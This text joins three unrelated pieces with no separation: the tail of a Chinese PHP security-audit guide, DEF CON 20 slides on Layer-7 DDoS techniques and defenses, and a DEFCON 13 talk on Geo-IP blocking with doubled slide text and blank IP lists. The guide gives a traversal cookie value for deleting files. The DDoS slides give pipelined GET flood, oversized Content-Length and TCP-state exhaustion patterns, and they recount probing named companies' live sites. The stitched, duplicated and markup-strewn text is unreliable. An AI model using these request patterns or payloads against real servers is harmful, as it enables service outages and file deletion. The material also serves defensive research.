0.85cm; margin-bottom: 0cm; line-height: 125%">PHP4 和 PHP5<5.2.6,这两个函 数处理数据是不安全的。在 web 应用中很多使用 mt_rand 来处理随机的 session,比如密码找回 功能等,这样的后果就是被攻击者恶意利用直接修改密码。 7. 特殊字符和多字节编码 1. 多字节编码 8. PHP 危险函数 1. 缓冲区溢出 作者:http://www.sectop.com/ 文档制作:http://www.mythhack.com  confirm_phpdoc_compiled 影响版本: phpDocumentor phpDocumentor 1.3.1 phpDocumentor phpDocumentor 1.3 RC4 phpDocumentor phpDocumentor 1.3 RC3 phpDocumentor phpDocumentor 1.2.3 phpDocumentor phpDocumentor 1.2.2 phpDocumentor phpDocumentor 1.2.1 phpDocumentor phpDocumentor 1.2  mssql_pconnect/mssql_connect 影响版本:PHP <= 4.4.6  crack_opendict 影响版本:PHP = 4.4.6  snmpget 影响版本:PHP <= 5.2.3  ibase_connect 影响版本:PHP = 4.4.6  unserialize 影响版本:PHP 5.0.2、PHP 5.0.1、PHP 5.0.0、PHP 4.3.9、PHP 4.3.8 e="font-size: 10pt">、 PHP 4.3.7、PHP 4.3.6、PHP 4.3.3、PHP 4.3.2、PHP 4.3.1、PHP 4.3.0、PHP 4.2.3、PHP 4.2.2、PHP 4.2.1、PHP 4.2.0、PHP 4.2-dev、PHP 4.1.2、PHP 4.1.1、PHP 4.1.0、PHP 4.1、 PHP 4.0.7、PHP 4.0.6、PHP 4.0.5、PHP 4.0.4、PHP 4.0.3pl1、PHP 4.0.3、PHP 4.0.2、 PHP 4.0.1pl2、PHP 4.0.1pl1、PHP 4.0.1 2. session_destroy()删除文件漏洞 影响版本:不祥,需要具体测试 测试代码如下: <?php session_save_path(‘./’); session_start(); if($_GET[‘del’]) { session_unset(); session_destroy(); }else{ $_SESSION[‘do’]=1; echo(session_id()); print_r($_SESSION); } ?> 当我们提交 cookie:PHPSESSIONID=/../1.php,相当于删除了此文件 3. unset()-zend_hash_del_key_or_index 漏洞 作者:http://www.sectop.com/ 文档制作:http://www.mythhack.com zend_hash_del_key_or_index PHP4 小于 4.4.3 和 PHP5 小于 5.1.3,可能会导致 zend_hash_del 删除了错误的元素。当 PHP 的 unset()函数被调用时,它会阻止变量被 unset。 9. 信息泄露 1. phpinfo 如果攻击者可以浏览到程序中调用 phpinfo 显示的环境信息,会为进一步攻击提供便利 10. PHP 环境 1. open_basedir 设置 open_basedir 能限制应用程序能访问的目录,检查有没有对 open_basedir 进行设置,当 然有的通过 web 服务器来设置,例如:apache 的 php_admin_value,nginx+fcgi 通过 conf 来控 制 php 设置 2. allow_url_fopen 设置 如果 allow_url_fopen=ON,那么 php 可以读取远程文件进行操作,这个容易被攻击者利用 3. > allow_url_include 设置 如果 allow_url_include=ON,那么 php 可以包含远程文件,会导致严重漏洞 4. safe_mode_exec_dir 设置 这个选项能控制 php 可调用的外部命令的目录,如果 PHP 程序中有调用外部命令,那么指 定外部命令的目录,能控制程序的风险 5. magic_quote_gpc 设置 这个选项能转义提交给参数中的特殊字符,建议设置 magic_quote_gpc=ON 作者:http://www.sectop.com/ 文档制作:http://www.mythhack.com 6. register_globals 设置 开启这个选项,将导致 php 对所有外部提交的变量注册为全局变量,后果相当严重 7. safe_mode 设置 safe_mode 是 PHP 的重要安全特性,建议开启 8. session_use_trans_sid 设置 如果启用 session.use_trans_sid,会导致 PHP 通过 URL 传递会话 ID,这样一来, 攻击者就更容易劫持当前会话,或者欺骗用户使用已被攻击者控制的现有会话。 9. display_errors 设置 如果启用此选项,PHP 将输出所有的错误或警告信息,攻击者能利用这些信息获取 web 根 路径等敏感信息 10. expose_php 设置 如果启用 expose_php 选项,那么由 PHP 解释器生成的每个响应都会包含主机系统上 所安装的 PHP 版本。了解到远程服务器上运行的 PHP 版本后,攻击者就能针对系统枚举已 知的盗取手段,从而大大增加成功发动攻击的机会。 参考文档 https://www.fortify.com/vulncat/zh_CN/vulncat/index.html http://secinn.appspot.com/pstzine/read?issue=3&articleid=6 http://riusksk.blogbus.com/logs/51538334.html http://www.owasp.org/index.php/Category:OWASP_Code_Review_Project
DDoS Black and White “Kungfu” Revealed (DEF CON 20 Edition) {Tony Miu (aka MT), Anthony Lai (aka Darkfloyd), Alan Chung (aka Avenir), Kelvin Wong (aka Captain)} Valkyrie-X Security Research Group (VXRL) Disclaimer • There is no national secrets leaked here. • Welcome to all national spies.  • No real attacks are launched. • Please take it at your own risk. We can't save you from the jail. We don't talk about… There is a real good DDoS business in China because it creates attack assignments and lots of defense opportunities in other world. Thank you so much, China, Xie Xie! We don't talk about .... For example: http://www.1380sf.com/ Agenda • Members introduction • Research and Finding – Part 1: Layer-7 DoS vulnerability analysis and discovery. – Part 2: Core Attack Concept and Empower Attack Server with demos – Part 3: Defense Model Biography Tony Miu (aka MT) •Apart from a being a researcher at VXRL, MT currently working at Nexusguard Limited. Throughout his tenure, MT has been at the forefront of the cyber war zone - responding to and mitigating myriads of cyber attacks that comes in all forms and manners targeted at crushing their clients' online presence. •MT's task is clearly critical. It is therefore imperative that MT be well versed in the light and dark sides of DDoS attack methodologies and undertakes many leading role in both DDoS kungfu and defense model projects. Biography Anthony Lai (aka Darkfloyd) • Focuses on reverse engineering and malware analysis as well as penetration testing. His interest is always falling on CTF and analyzing targeted attacks. • Founder of VXRL. • He has spoken in Black Hat USA 2010, DEF CON 18 and 19, AVTokyo 2011, Hack In Taiwan 2010 and 2011 and Codegate 2012. • His most recent presentation at DEF CON was about APT Secrets in Asia. • His recent fun experience was winning 12,000 TWD with PLUS CTF team in HITCON 2012  Biography Alan Chung (aka Avenir) • Avenir has more than 8 years working experience on Network Security. He currently is working as a Security Consultant for a Professional Service provider. • Alan specializes in Firewall, IDS/IPS, network analysis, pen-test, etc. Alan’s research interests are Honeypots, Computer Forensics, Telecommunication etc. Biography Kelvin Wong (aka Captain) • Works in law enforcement over 10 years responsible for forensics examination and investigation; research and analysis. • Investigate various reported criminal cases about DDoS and network intrusion. • A real frontline officer fights against the criminals and suspects. Part 1: Layer-7 DoS vulnerability analysis and discovery. Research and Findings Test Methodology • We have used a few common Layer-7 DoS techniques in our test: – HTTP GET and POST methods – HTTP Pipelining – Malformed HTTP request – Manipulate TCP x HTTP vulnerabilities Techniques Overview : Pre-Attack • Find out any HTTP allowed methods • Check whether a site accepts POST method as well even it accepts GET method in the Web form • Check out any resources-intensive function like searching and any function related to database retrieval. • Check out any HTTP response with large payload returned from the request. • Check out any links with large attachment including .doc and .pdf files as well as media (.mp4/mp3 files) (i.e. JPEG could be cached) • Check whether HTTP response is cached or not • Check whether chunked data in HTTP response packet from the target is allowed. (i.e. incomplete request) Techniques Overview : Attack Techniques Attack Combo #1: • Seek and manipulate the TCP and HTTP characteristics and vulnerabilities • Find any URL(s) which accepts POST -> Change Content Length to 9999 (i.e. abnormal size) bytes -> See whether it keeps the connection alive (Attack Combo #1 Detailed explanation in Part 2) Techniques Overview : Post-Attack Techniques Attack Combo #1: We could guess and learn the behavior and devices behind: • Check the TCP established state timeout value • Check the TCP first PSH/ACK timeout value • Check the TCP continuous ACK timeout value • Check the TCP first FIN_WAIT1 timeout value • Check the TCP last ACK timeout value Techniques Overview : Post-Attack Techniques Attack Combo #1 (Continue): • Wait for FIN/ACK – Initiated by target’s server • Wait for RST/ACK – Initiated by requestor, target’s server or CDN • Wait for RST – Initiated by device like IDS, IPS, etc Techniques Overview : Post-Attack Techniques Goals • Calculation of resources could help to bring down the target. • Trace its detection (i.e. Rate Limit) • Guess its DDoS mitigation(s) • Submit an incomplete HTTP POST packet attack to the back-end server. Techniques Overview : Attack Techniques Attack Combo #2: • Manipulate the vulnerabilities due to poor server hardening. • Accept a simple HTTP request (i.e. accept simple HTTP request connection including fields like HOST, Connection and ACCEPT only) Simple GET attack pattern in 4 years ago • GET / HTTP/1.1\r\n Host: www.xxx.com\r\n User-Agent: Mozilla/4.0\r\n Connection: keep-alive\r\n\r\n • The site does not check cookie value, referer value. • It means there is NO HARDENING  • User-Agent value: Mozilla/4.0\r\n is a common botnet used “label”, however, it still could be accepted. Techniques: Attack Techniques Attack Combo #2: • Whether it accepts HTTP pipelining – It is a RFC standard but rare to use GET / HTTP/1.1\r\nHost: www.xxxxxxxx.com\r\nUser-Agent: Mozilla/4.0\r\nConnection: keep-alive\r\n\r\nGET /?123 HTTP/1.1\r\nHost: www.xxxxxx.com\r\nUser-Agent: Mozilla/4.0\r\nConnection: keep-alive\r\n\r\nGET /?123 HTTP/1.1\r\nHost: www.xxxxxx.com\r\nUser-Agent: Mozilla/4.0\r\nConnection: keep-alive\r\n\r\nGET /?123 HTTP/1.1\r\nHost: www.xxxxxx.com\r\nUser-Agent: Mozilla/4.0\r\nConnection: keep-alive\r\n\r\nGET /?123 HTTP/1.1\r\nHost: www.xxxxxx.com\r\nUser-Agent: Mozilla/4.0\r\nConnection: keep-alive\r\n\r\nGET /?123 HTTP/1.1\r\nHost: www.xxxxxx.com\r\nUser-Agent: Mozilla/4.0\r\nConnection: keep-alive\r\n\r\nGET /?123 HTTP/1.1\r\nHost: www.xxxxxx.com\r\nUser-Agent: Mozilla/4.0\r\nConnection: keep-alive\r\n\r\nGET /?123 HTTP/1.1\r\nHost: www.xxxxxx.com\r\nUser-Agent: Mozilla/4.0\r\nConnection: keep-alive\r\n\r\nGET /?123 HTTP/1.1\r\nHost: www.xxxxxx.com\r\nUser-Agent: Mozilla/4.0\r\nConnection: keep-alive\r\n\r\nGET /?123 HTTP/1.1\r\nHost: www.xxxxxx.com\r\nUser-Agent: Mozilla/4.0\r\nConnection: keep-alive\r\n\r\nGET /?123 HTTP/1.1\r\nHost: www.xxxxxx.com\r\nUser-Agent: Mozilla/4.0\r\nConnection: keep-alive\r\n\r\nGET /?123 HTTP/1.1\r\nHost: www.xxxxxx.com\r\nUser-Agent: Mozilla/4.0\r\nConnection: keep-alive\r\n\r\n") Techniques: Attack Techniques Attack Combo #2: - Utilize all HTTP requests (PSH/ACK) in the same packet with size lower than 1500 bytes. - HTTP request in packet could be multiplied by 7 times or more. Techniques: Attack Techniques Attack Combo #2: • Finding large-size packet data payload like picture and audio files, which could not be cached and with authentication check (like CAPTCHA) in advance. • Goals: – Increase loading of server and CPU and memory usage – Increase the bandwidth consumption Techniques: Attack Techniques Attack Combo #2: • Force to get a new session and connection without cache. It could “guarantee” bypass load balancer and Proxy. • Force not to load cache, for example: • http://www.abc.com/submitform.asp? 234732893845DS4fjs9 • Cache:no cache and expiry date is 1994 Techniques: Attack Techniques • Attack Combo #2 • Combined with Simple GET, HTTP Pipelining and Force not loading cache GET /download/doc.pdf?121234234fgsefasdfl11 HTTP/1.1\r\n Host: www.xxxxyyyyzzzz.com\r\n User-Agent: Mozilla/4.0\r\n Connection: keep-alive\r\n\r\n GET /download/doc.pdf?121234234fgsefasdfl22 HTTP/1.1\r\n Host: www.xxxxyyyyzzzz.com\r\n User-Agent: Mozilla/4.0\r\n Connection: keep-alive\r\n\r\n GET /download/doc.pdf?121234234fgsefasdfl33 HTTP/1.1\r\n Host: www.xxxxyyyyzzzz.com\r\n User-Agent: Mozilla/4.0\r\n Connection: keep-alive\r\n\r\n We follow RFC all the time  Our Test Targets •United State ( 39 ) •Europe (20) •Asia Pacific (20) 7/11/12 It looks like we also test a CDN.... Test Summary We only test their landing page only: Accept simple GET: 26/39 Accept simple POST (without Content Length): 4/39 Method not allowed: 5/39 Accept simple POST (with Content Length):17/39; Method not allowed: 8/39 Accept HTTP pipelining: 34/39 Simple GET – Accept Botnet- favorite GET header?! 7/11/12 Simple GET with Pipelining 7/11/12 Simple GET with Pipelining 7/11/12 Simple POST 7/11/12 Simple POST 7/11/12 Network Giant: I am shit corps?! (Nothing doing with DoS ) 7/11/12 Summary 1.Simple GET should be banned; 2.We don't think they should accept content length with invalid value, check length is required; 3. Page does not support POST could accept POST request; Page is supposed not to accept any method(s) it does not support; 4. A few corps still disclosed its supporting method. As attack method is not just limited to GET and POST. Did they carry out any basic assessment? It looks nothing special yet but they are prerequisites for our further test and part 2  Further ... Content Length is 999 or 9999 Accepted: Amazon American airline CNN GS Mastercard (Let us dive into this case) McDonalds ...... Deep Analysis: Mastercard.us Simple GET - Lazy to fill in the HTTP Field, please help, Akamai Notice: Plz don’t test on “GET HTTP/1.1” or database related application, it will reply too many things Dear Customer, For the improvement of our service, there are NO CAPTCHA and auth, you can download PDF, SWF, ZIP freely. SIMPLE POST is not allowed We have advance POST method, it will hold TCP established state ~2mins. I hate cookies, I hate POST data  Is Akamai bypassed? Defense point of view • Loadbalancer/proxy will forward the incomplete HTTP request • If something dropped the incomplete request: • Case 1: Security device interrupt the incoming traffic and RST send to Server. • Case2: Security send the RST or RST ACK to Client. 7/11/12 We never know there is POST method in DoD  We never know the Advanced Search in HKEX using POST method and heavy loading(Hong Kong Trading Halted by DDoS)  Suggested Attack Pattern • No chance to use it, simple GET / POST is always working. GET /?xxxxxxxxxx HTTP/1.1\r\n Host: www.ddd.ccc\r\n Accept: */*\r\n Accept-Language: en-us\r\n Accept-Encoding: gzip, deflate\r\n User-Agent: User-Agent: Mozilla/4.0 (Windows; U; Windows NT 5.1; en-GB; rv: \r\n Connection: Keep-Alive\r\n\r\n 7/11/12 Part 2: Core Attack Concept and Empower an Attack Server (with demos) Before taking Appetizer, let us do the demo Let us give three demos: Attack Server: Backtrack 5, 512M Ram, 2 CPU (VM) Web Server(victim): Windows server 2008 R2, IIS 7.5 with a text web page, 2G RAM, no application and database, hardware PC. 1.Attack target server and stuck TCP state CLOSE_WAIT 2.Attack target server and stuck TCP state FIN_WAIT1 3.Attack target server and stuck TCP state Established 7/11/12 Attack Goals Demo 1: Cause server unstable Demo 2: Cause the unavailability of service in a minute Demo 3: Cause the unavailability of service instantly 7/11/12 Demo time – Server Side 1 bytes = 8 bit, we use bit per second(bps) in networking. windows use byte per second!!! Incoming attack traffic Demo1: ~2.7mx8 = 21 mbps Demo2: ~1.3mx8=10.4mbps Demo3: ~1mx8=8mbps 7/11/12 What are the theories and ideas behind Demos 1-3? 7/11/12 Core Attack Concept • Don’t focus on HTTP method. This server is not killed by HTTP related vulnerability. Otherwise, • HTTP GET flood - unstable and high CPU • HTTP POST flood - unstable and high CPU • HTTP HEAD flood - unstable and high CPU • HTTP XXX flood - xxxx and high xxxx only • Demo 1 attack also unstable and high CPU only We are not DoS attack to OS and Programming Language • This attack is against to a kind of OS and programming language. e.g. Apache killer, etc. • Our Attack FOCUS is on Protocol – TCP and HTTP, we are going to do a TCPxHTTP killer. • Any server not using TCP and HTTP? We do not present IIS killer, Apache killer, Xxx killer!!! TCP state is the key • Focus on TCP state. • Use the HTTP as an example to control the TCP state. • Manipulate the TCP and HTTP characteristics and vulnerabilities • Server will reserve resource for different TCP states. • The Same Layer 7 Flood to Different targets can different TCP state. • TCP state attack is decided upon various cases, depends on web application, OS and HTTP Method. • The key is based on reply of server. E.g. Fin-Ack, RST, RST-Ack, HTTP 200, HTTP 302…etc. Logical Diagram Super combo Period =TCP State 7/11/12 Health = Server resourcePoint Hits = TCP Connection Kyo = Attack server Super combo = HTTP Request Power= High CPU Andy in fire = Web server Keep Super Combo to Andy •We wish to extent the super combo period!!! •We will discuss the 3 different TCP states. •Targeted TCP state: • Demo 1: TCP CLOSE_WAIT • Demo 2: TCP FIN_WAIT_1 • Demo 3: TCP ESTABLISHED P.S. In King Of Fight 2003, it is bug. Demo 1. TCP STAT CLOSE_WAIT From RFC: “CLOSE-WAIT - represents waiting for a connection termination request from the local user.” • Demo 1 is simulating the most common DDoS attack. • Web server are only with high CPU usage and in unstable status • SLA for Attacker, you are failed and no money!!!! • Hardened Web server = Loadbalancer. • If we use more zombies, it still working. But zombies = money…… Demo 1. TCP STAT CLOSE_WAIT Just like a light punch, easy to defense~ Fix: •Harden Server TCP parameters •Most of network security devices can set the timeout (e.g. Proxy, firewall, DDoS mitigation device) Demo 1. TCP STAT CLOSE_WAIT Demo time: Client-end (Dummy edition) 7/11/12 Demo 1 – The Key for goal • Client MUST send FIN_ACK in advance but server • No need to do anything……. 7/11/12 Demo 2. TCP FIN_WAIT_1 Demo 2. TCP FIN_WAIT_1 From RFC: “FIN-WAIT-1 STATE In addition to the processing for the ESTABLISHED state, if our FIN is now acknowledged then enter FIN-WAIT-2 and continue processing in that state. FIN-WAIT-2 STATE In addition to the processing for the ESTABLISHED state, if the retransmission queue is empty, the user's CLOSE can be acknowledged ("ok") but do not delete the TCB. CLOSE-WAIT STATE Do the same processing as for the ESTABLISHED state. CLOSING STATE In addition to the processing for the ESTABLISHED state, if the ACK acknowledges our FIN then enter the TIME-WAIT state, otherwise ignore the segment. LAST-ACK STATE The only thing that can arrive in this state is an acknowledgment of our FIN. If our FIN is now acknowledged, delete the TCB, enter the CLOSED state, and return. TIME-WAIT STATE The only thing that can arrive in this state is a retransmission of the remote FIN. Acknowledge it, and restart the 2 MSL timeout.” Demo 2. TCP FIN_WAIT_1 •Depends on OS, time out around 60s and hard to fine tune in Server. •RFC: “Client can still receive data from the server but will no longer accept data from its local application to be sent to the server.” •Server will allocate resource to handle web service •Web application will keep holding the resource and memory overflow during the attack Demo time: Client-end (Home Make Edition) 7/11/12 Demo 2 - The key for our goal • Check the TCP first FIN_WAIT1 timeout value • Wait for RST/ACK – Initiated by requestor, target’s server or CDN 7/11/12 Demo 2 – Wait for the FIN, PSH, ACK from Server 7/11/12 Remember the video? For IIS case, “connection: close” included. FIN will send and be changed to FIN_WAIT_1 state 7/11/12 Demo 3. TCP Established Demo 3. TCP Established •RFC: ” represents an open connection, data received can be delivered to the user. The normal state for the data transfer phase of the connection.” •TCP Established, it is an active connection. •Server will allocate a lot resource to handle web service and web application. •The time out of TCP Established state is very long. (around 3600s) •The time out of TCP Established state can’t be too short. •Compare all of the other TCP state, this case will use most of resource in the server. Demo 3. TCP Established • Base on the design of HTTP method, we can force the server to use more resources. • Fragmented and incomplete packet continuously • In this example: - HTTP POST Method + “Content-length: 99999” • HTTP GET Method with packet size over 1500 without “\r\n\r\n”, are same result. • It is an incomplete HTTP request • Timeout depends on application and server, may be 30s, 5mins, 10mins or more. • Incomplete HTTP request can bypass the Network Security devices. Demo 3. Vs Slowloris Slowloris: Slowloris is extent the TCP Established State in ONE connections. Just like we try to dig a hole(HTTP request) on the ground(Server resource) and fill in the water(packets) slowly. Our Demo 3: Our Demo 3, it is find out the max size of hole, and dig many of holes . The size is random. Demo time: Client-end (Monkey Play Level) 7/11/12 Demo 3 - The Key for goal • Check the TCP establishment timeout value (when we send PA) • Check the TCP continuous ACK timeout value (after PA) • Wait for FIN/ACK – Initiated by target’s server 7/11/12 Demo 3 – TCP Establishment timeout • Let us send the first PUSH ACK to server together before the timeout? • Good luck, firewall, router, IPS, WAF,etc. 7/11/12 Demo 3 – TCP continuous ACK timeout value-1 • After client sent the first Push ACK in TCP established state, client do nothing. It is the timeout for server in TCP established state. For this demo, RST ACK is sent • Brother A’s timeout is 2mins 7/11/12 Demo 3 – TCP continuous ACK timeout value-2 • The timeout for Server to keep the TCP established state. (slowloris doing it) 7/11/12 Standard 2 mins time out 7/11/12 Forgotten • It is FAKE ip address(Trust me, it can fake 3 way handshake) • HKEX already spend XXX million dollar to rebuild the DDoS solution and fix the problem. • I am sorry, it’s my fault, i forgot to fill in Cookies, referer, correct POST data…… • Internationlow(international low) Security Standard over the World…. 7/11/12 Attack Conclusion For Demos 1-3 • Signature-based detection cannot be useful to detect our attack as the HTTP fields could be randomized. • Our attack is customized for each target individually. • For example, the content length is decided based on the Web application • test the boundary values of rate limit of any security and detection devices. • Confuse the security detection device with “look-like” real HTTP request. Any others Demo? Demo 4 empower a Attack server Demo 5 Online game Demo 6 Trading application Demo 7 HTTPS Demo 8 Android Play shop Demo 9 …… But we only 50mins, XD 7/11/12 PoC of Case study • Demo 1-3 are PoC for the analysis result and impact in Part 1. 7/11/12 We have a great weapon and need a best solider 7/11/12 Before taking empower Attack Server ... Let us give another demo: Attack Server: Backtrack 5, 512M Ram, 2 CPU (VM) Web Server: Windows server 2008 R2, IIS 7.5 with a text web page, 2G RAM, no application and database, hardware PC. 7/11/12 Attack Goal Empower a client “without” established any connection and intensive use of memory and CPU.” Server will hold the TCP established connection 7/11/12 Demo • We launched the attack with our designed Attack Server (in demo 4) with stuck TCP Establish state (in demo 3) technique 7/11/12 Demo time Server-end 7/11/12 Design Overview • Current DDoS mitigation method violates RFC standard. • Our Attack Server also adopt DDoS mitigation methods into the design • Our Attack Server’s protocol design “looks like” fulfilling a RFC standard. We simply adopt the DDoS mitigation method and design into our Attack Server. • This solider design is for our Demo 3 attack technique. 7/11/12 Our Attack Server’s Design 7/11/12 Demo time Client-end 7/11/12 1. Show Attack Server’s Resources Status 7/11/12 2. Generating an attack 7/11/12 3. Show the target’s server status 7/11/12 4. Show attack server status AFTER attack 7/11/12 Attack Server Features • Our designed Attack Server could launch attack against multiple targets • All available layer-7 attack methods (e.g. XXX flood) could fuck up the target. • Most of the victims stuck in TCP established state. 7/11/12 Design and power-up your Attack Server It could have many different types of solider. E.g. Attack Server + Syncookie, syncache, share database with HTTP request…… 7/11/12 Summary Could you imagine the consequence and impact if we link up studies in Part 1 and Part 2 together against our targets? 7/11/12 Part 3: Defense Model Existing DDoS mitigation countermeasure • TCP Layer Authentication • HTTP Layer Authentication (redirect, URL) • HTTP Layer interrupt (Captcha) • Signature base application detection • Rate limit 7/11/12 I have a Dream~ 7/11/12 Apache Gateway with Loadbalancers group Custom Filter by script All zombie suicide User no need to use captcha like auth Design Overview – Application Gateway (AG) • Develop the apache module for defense Layer 7 DDoS. • Apache Web Service • Hardened Apache Server • Authentication code module • Control Policy module • Routing and Forwarding Engine • GUI Control Panel • Rewrite the TCP protocol in Linux Kernel Module 7/11/12 7/11/12 BY Tony Miu 7/11/12 BY Tony Miu POST / GET Flood to AG (First handshake phase) Attack example : GET / HTTP/1.1 or GET / <some-url, but not our page> / 1.1 •If the Attack cannot be redirect • Check the HTTP field, and will drop the non standard HTTP request. • Close the connection, and afterwards, attack suspended. • (Most of the Zombie cannot handle the redirect) 7/11/12 POST / GET Flood to AG (First handshake phase) (cont.) • If the Attack can be redirect • Response action • Redirect the Get Flood (Redirect 301) to phase 2, with new session • Close the existing connection in AG 7/11/12 POST / GET Flood to AG (Second handshake phase) • User send the GET request with HTTP field Referrer. • With Referrer (Allow Traffic): • Assign a checkable value and referrer value to the user’s web browser • Optional : Require the client side running the formula with JavaScript, and the result will be used in phase 3. (use for increase the client side CPU usage.) • Redirect the request to phase 3 with new session • Close the current connection in AG 7/11/12 • Without Referrer (Attack) (Drop Traffic) : • Close the connection • For HTTP POST request, it will be dropped instantly. 7/11/12 POST / GET Flood to AG (Second handshake phase) (cont) POST / GET Flood to AG (Third handshake phase) • User send the GET request to the checking page with the checkable value received in Phase 2. • Incomplete HTTP request will be dropped. • Set the passed traffic in the white list. • Set the connection limit per IP address • (eg. Block the IP address, over 10 request per minute.) • Set the limit per request, per URL • Set the time limit value. • Set the time out value. 7/11/12 Deploying mode • Host mode • E.g. Develop a module in Apache • Transparent mode • Easy to deploy; In front of Web server. • Reverse proxy mode • Easy to deploy • Load balancer mode • Same as proxy, but it cannot handle a high volume bandwidth attack. 7/11/12 Best deployment location • Before the firewall, behind the router • Analyzing and filtering over the high volume traffic happens in the first place so as to prevent the high volume DoS attack. • Behind the firewall (with content forward) i. The firewall redirects the http traffic to the apache gateway. (eg. Check Point CVP or Juniper UTM Redirect Web Filtering) ii. After the HTTP traffic analysis, the clean traffic will be sent back to the firewall. iii. The firewall will continue process the traffic by rule 7/11/12 Best deployment location (cont’) • Behind the firewall (route mode, proxy mode) i. After the traffic analysis by the firewall, the traffic will pass to the apache gateway ii. After the analysis, the clean traffic will route to the web server • Install & integrate with the web server i. The traffic input to the Apache gateway (filtering module) ii. After the Apache gateway (filtering module) analysis complete iii. The (filtering module) will pass the traffic to the web page module (or other web server program.) 7/11/12 Best deployment location (cont’) • Integrated with the load balancer i. The http traffic will input to the Apache Gateway ii. The Apache will process & analysis the HTTP traffic iii. The clean traffic will transfer to the load balancer iv. The load balancer will load sharing the traffic to the Web Server farm 7/11/12 Roadmap Phase 1: Integrate the IDS/IPS, Firewall and black hole system with the Layer-7 Anti-DDoS Gateway. Phase 2: Develop the API for custom script Phase 3: Develop a Blacklist on IP addresses grouped by time and IP address Blacklist system and Generation mechanism. 7/11/12 Thank you very much for your listening, Xie Xie  Tony: mt[at]vxrl[dot]org Alan: avenir[at]vxrl[dot]org Anthony: darkfloyd[at]vxrl[dot]org Kelvin: captain[at]vxrl[dot]org Website: www.vxrl.org
Geo Geo--IP Blocking: A sometimes IP Blocking: A sometimes effective Mal effective Mal--ware deterrent ware deterrent DEFCON 13 Presentation July 30, 2005 Agenda Agenda What is Geo-IP Blocking? Why Geo-IP Block? Why not to Geo-IP Block How Geo-IP Blocking works Regional Internet Registries (RIRs) Different Geo-IP Blocking strategies Automation Caveats Presenter AKA Shameless Presenter AKA Shameless Personal Plug Personal Plug Tony Howlett President of Network Security Services, Inc. CISSP, GSNA, CNA, CSSA Author of “Open Source Security Tools” 17 years of experience building and managing networks What is Geo What is Geo--IP Blocking? IP Blocking? Indiscriminately blocking entire sections of IP addresses related to geographical areas at your firewall or router Spam Statistics Spam Statistics A recent study show that the following countries were the leaders in originating spam USA 42% South Korea 13% China 8% Blocking those two countries alone would take care of 21% of your spam Source: SpamHaus 2005 Why Geo Why Geo--IP Block? IP Block? Quick (within minutes) No Cost (just entries in a router) Avoids almost ALL types of attacks including zero day and unreported exploits (at least those originating from the blocked countries) Easily reversible Users can still access blocked sites outbound Most companies don’t need to give the ENTIRE world access to their network. Even Fortune 500 companies can use this for some parts of their network. More Reasons to Geo More Reasons to Geo--IP Block IP Block – May become more effective over time as more spam / malware moves offshore – May force “bad actor” countries to crack down on spam / malware – China recently announced a crackdown on spam partially due to pressure form ISPs blocking their IP space Types of Types of malware malware Geo Geo--IP can IP can stop stop – Spam – Email Fraud – Phishing – Viruses – Worms – Automated hacking tools – Manual hacking (script kiddies) – Prohibited website hosted offshore (porn, gambling, etc) Reasons NOT to Geo Reasons NOT to Geo--IP block IP block – Not 100% effective (what is?) – Goes against the idea of global access to the Internet – Large multinational corporation (may still work in some limited instances) – Doing business overseas (may still work for some areas) – Will block all emails form that part of the world (unless you except mail traffic from your rules) How Geo How Geo--IP Blocking Works IP Blocking Works – IANA assigns address blocks out to the Regional Internet Registries (RIRs) for local assignment – American Registry for Internet Numbers (ARIN) handles North America Other Other RIRs RIRs APNIC (Asia) RIPE (Europe, Middle East and Central Asia) LACNIC (Latin America) AfriNIC (new RIR for Africa) APNIC (Asia) APNIC (Asia) Asia Pacific Network Information Centre Takes in many of the bad actor counties (the #2 and #3 spammers in our example) Just blocking APNIC could lower your malware hits by 20-30% Be careful; also cover Japan where a lot of westerners do business APNIC APNIC IPs IPs to block* to block* *List not guaranteed to be complete or accurate, caveat emptor China Only (with APNIC and China Only (with APNIC and ARIN IP space)* ARIN IP space)* *List not guaranteed to be complete or accurate, caveat emptor - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Korea Only (with APNIC and Korea Only (with APNIC and ARIN IP space)* ARIN IP space)* *List not guaranteed to be complete or accurate, caveat emptor - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Riseaux Riseaux IP IP Europeens Europeens (RIPE) (RIPE) Covers Europe, the Middle East and Central Asia Not as effective to block country by country as many blocks cover multiple countries (Multinational ISPs, companies, etc) Also hard to block wholesale as a lot of global companies based in Europe There are a few troublesome countries worth blocking (Russia, Bulgaria, Romania) RIPE RIPE IPs IPs to block* to block* *List not guaranteed to be complete or accurate, caveat emptor LACNIC LACNIC Latin America and Caribbean Many organizations / entities may still use ARIN addresses Brazil and Argentina are worst offenders Border companies may want to leave in Mexico LACNIC LACNIC IPs IPs to block* to block* *List not guaranteed to be complete or accurate, caveat emptor Complete Brazilian List with Complete Brazilian List with ARIN assignments ARIN assignments AfriNIC AfriNIC A lot of fraud and phishing based here Not much legitimate commerce (except for energy companies) Since this is new, many assignments still come from RIPE address space AfriNIC AfriNIC IPs IPs to Block to Block Geo Geo--IP Blocking Strategies IP Blocking Strategies The Shotgun Approach Block Entire RIR address space Pros: Easy and Quick Cons: Might block some countries or areas you want. Example: Australian and New Zealand sites use APNIC address space Geo Geo--IP Blocking Strategies IP Blocking Strategies The Rifle Approach Block by specific country assignments Pros: Less likely to block wanted traffic Cons: Time consuming, have to keep configs up to date, some assignments not country specific Limited Geo Limited Geo--IP Blocking IP Blocking Strategies Strategies Block all protocols but mail (no spam benefit) Block all except web server and mail Block on all private LAN segments but not DMZ (no spam or public server exploits benefits) More Limited Geo More Limited Geo--IP Blocking IP Blocking Block only interactive services (Telnet, SSH, VNC, Terminal services) Block only on specialized servers (VPN, database) Block RIR but allow certain ISP and hotel webspace (to allow for VPN access) IP Chains Geo IP Blocking IP Chains Geo IP Blocking Example Example ipchains -I input -s -j DENY Cisco Geo IP Blocking Cisco Geo IP Blocking Example Example access-list 101 deny ip any SonicWall SonicWall Geo IP Blocking Geo IP Blocking Example Example Geo Geo--IP Blocking Automation IP Blocking Automation Ip.ludost.net has a script that will generate country specific lists for importing into a IP Tables format There are companies now that will do this work for you, producing a file for importing into your configs Used by large websites, search engines, some ISPs Resources Resources Bob’s IP blocking list (http://www.unixhub.com/block) IP to Country Database at Ludost.net (http://ip.ludost.net) Questions / Comments / Abuse? Questions / Comments / Abuse? Email me at thowlett@netsecuritysvcs.com The presentation will be posted to : www.netsecuritysvcs.com/defcon13/
